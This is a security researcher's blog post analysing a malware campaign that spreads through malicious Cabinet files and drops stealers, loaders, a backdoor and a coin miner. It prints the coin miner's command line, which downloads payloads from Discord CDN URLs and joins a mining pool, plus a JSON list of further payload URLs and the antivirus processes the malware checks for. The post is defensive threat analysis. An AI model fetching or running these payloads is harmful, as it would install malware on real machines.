Sitemap

Sign in

Medium Logo
Write

Sign in

MalCabinet Campaign

morimolymoly
4 min readJan 6, 2024

In these days, Microsoft Malicious Cabinet is rising. It deceive humans and deploy stealer and so on.

icon
Resource Hacker

Cabinet file is used for distributing software and pathes. It looks completely legit to open so please be careful.

I detonated sample on ANYRUN and see what is going on!

MalCabinet Campaign

MalCabinet Campaign deploys Amadey, AutoIT malware, Redline, Some Loader, Glupteba, and so on.

Detonation1

Detonation2

As you can see payload varies and changes.

First Loader

First Loader is a Microsoft Cabinet FIle. Using 7-zip to extract it, and you can find two binaries,

ck5Ex60.exe is also a Microsoft Cabinet File.

Extracted files are here.

Process trees are here!

1TD30cg5.exe

This binary AutoIT was used so I checked the code for it with Autoit-Ripper!

https://github.com/nazywam/AutoIt-Ripper

2rv6894.exe

2rv6894.exe is a backdoored SFX file.

Here is a decompressed file! This does some AVEvasion.

The Following are identified!

  • avastui.exe
  • avgui.exe
  • nswscsvc.exe
  • sophoshealth.exe
  • wrsa.exe

After that, several commands are executed, Random.pif is created!

Random.pif is an AutoIT3 itself. (Flexible + Canyon + Breach + Ross + Surround + Float) It is on VirusTotal.

VirusTotal

VirusTotal

VirusTotalwww.virustotal.com

q is an AutoIT malscript. (Geology + Silent + Guitar)

Here is a BinDiff result of AutoIT3 and Random,pif. It is almost the same.I thought that Random.pif is forked and modified but it is all done in script file.

Here is a source code of end decryption code.

For ease, I looked at detonation.

Here are modified files.

  • C:\Users\admin\AppData\Local\EchoTech Solutions\P is the backdoor
  • C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.pif is the same as Random,pif.
  • C:\Users\admin\AppData\Local\EchoTech Solutions\EchoScan.js does persist as C:\\Users\\admin\\AppData\\Local\\EchoTech Solutions\\EchoScan.pif\” \”C:\\Users\\admin\\AppData\\Local\\EchoTech Solutions\\P\
  • C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\19314\jsc.exe is risepro

7U1tD80.exe

7U1tD80.exe is a dropper.

Redline — golden.exe(dropper)

It injects Redline to RegAsm.exe.

Amadey

7UI1tD80.exe dropped C:\Users\admin\AppData\Local\Temp\d887ceb89d\explorhe.exe.

Persistence was registered by the schedule task.

Powered by https://tria.ge/240105-r89w8sfbb2/static1 .

nocry.exe

This binary drops many executables and files!

This binary is packed by ENIGMA.

This one is a loader.

Main parts of the dropped files are below.

  • C:\Users\admin\AppData\Local\Temp\FANBooster131\FANBooster131.exe
  • C:\Users\admin\AppData\Local\Temp\d887ceb89d\FANBooster131.lnk
  • C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe

It also has a stealer feature!

This set up persistence.

Coinminer uses Discord CDN

It was UPX packed so unpacked.

Let’s look at the arguments!

C:\Users\admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80

{“114d5a4b2915d940bdc913287a2e54ed8aef79bce092c370b1c849842045369c”:”https://cdn.discordapp.com/attachments/1176914652060459101/1177177951633149962/fHTPVEp.zip","3d771ccac3b2c7b21016a78d944dfb33c0aad3cb7fa44af7bdf33f39e7ad322b":"https://cdn.discordapp.com/attachments/1176914652060459101/1177177463311310868/IjWPLIVZIspdPDgr.bin.1.part","830afffc7dd32e007736f0d97e8d02f68f80988266e68e3de3250aa189ac8491":"https://cdn.discordapp.com/attachments/1176914652060459101/1177176971462049803/pIoKiczJtyqRd.bin","914facc0b22b640154b9cf433eb1d5fac8696aa7a9b15da2881c4b10f01daffa":"https://cdn.discordapp.com/attachments/1176914652060459101/1177177706736123905/LIFRROD.bin.2.part","920e35e11dca6b01c40707ed5a70c6ef542f4a1da35aab98d541c33ae5d5483f":"https://cdn.discordapp.com/attachments/1176914652060459101/1177177247510188102/tBqtIPGpFvDNsl.bin.0.part","9e4bb6f3dbf7b7769eb308db845eb076de1f384620abbf6de5fe2256ae7c460f":"https://cdn.discordapp.com/attachments/1176914652060459101/1177176748610289695/vJzoO.bin.zip"}

It combines and deploys it into C:\Users\admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe!

Conclusion

Stealer, Dropper, CoinMiner, backdoor, etc.. many malware was shipped by one ship! Spreading and initial infection may be the most difficult part of cyber crime. 0-day and 1-day is imposssible for those actors. Because as you can see the process tree, it all messed up! They don’t know how it goes well in cyber attack.

I don’t analyze malware deeper yet. I am still under researching.

Stay tuned!

--

--

morimolymoly
morimolymoly

Written by morimolymoly

38 followers
6 following

I am a Security Researcher. Feel free to reach me! Webpage: https://morimolymoly.com/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech